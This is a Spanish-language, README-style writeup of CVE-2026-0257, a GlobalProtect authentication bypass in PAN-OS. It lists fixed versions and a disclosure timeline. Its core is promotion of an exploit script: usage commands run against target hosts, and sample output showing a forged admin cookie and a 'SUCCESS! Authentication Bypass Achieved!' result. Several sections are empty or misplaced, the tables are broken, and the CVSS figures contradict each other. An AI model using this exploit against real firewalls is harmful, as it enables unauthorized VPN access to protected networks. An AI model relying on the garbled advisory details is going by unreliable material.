
CVE-2026-0257
PAN-OS: Vulnerabilidades de omisión de autenticación en GlobalProtect
Omisión de autenticación en el portal y la puerta de enlace de GlobalProtect
CVE-2026-0257 es una vulnerabilidad de omisión de autenticación que afecta los componentes del portal y la puerta de enlace de GlobalProtect del software PAN-OS de Palo Alto Networks.
Un atacante remoto no autenticado puede eludir las restricciones de seguridad y establecer una conexión VPN no autorizada a los firewalls afectados.
Nota: Panorama y Cloud NGFW no están afectados.
Vector (ejemplo CVSS 4.0):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
Las vulnerabilidades de omisión de autenticación en el portal y la puerta de enlace de GlobalProtect del software PAN-OS® de Palo Alto Networks permiten al atacante eludir las restricciones de seguridad y establecer una conexión VPN no autorizada.
El problema se origina en CWE-565: Dependencia de cookies sin validación ni comprobación de integridad.
No afectados:
Esta vulnerabilidad requiere la siguiente configuración para ser explotable:
Alto impacto en la confidencialidad e integridad de las redes protegidas.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
Versiones corregidas (aplicar urgentemente):
| Versión de PAN-OS | Versión corregida |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, etc. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, etc. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, etc. |
Prisma Access también tiene versiones corregidas correspondientes.
Soluciones temporales inmediatas (si no es posible aplicar parches):
| Fecha | Evento |
|---|---|
| 2026-05-13 | CVE publicado + Aviso inicial |
| 2026-05-17 | Explotación observada en estado salvaje |
Recomendación: Aplicar parches inmediatamente — tratar como crítico a pesar de la puntuación CVSS base debido a la explotación activa.
Generado en estilo README — 30 de mayo de 2026
| Métrica | Puntuación | Calificación |
|---|
| CVSS v4.0 | 7.8 / 4.7 | Alto / Medio |
| CVSS v3.x | Hasta 9.8 | Crítico |
| Urgencia | MÁXIMA | - |
| 2026-05-29 |
| Actualización de Palo Alto + Adición al CISA KEV |
| 2026-05-30 | Este informe |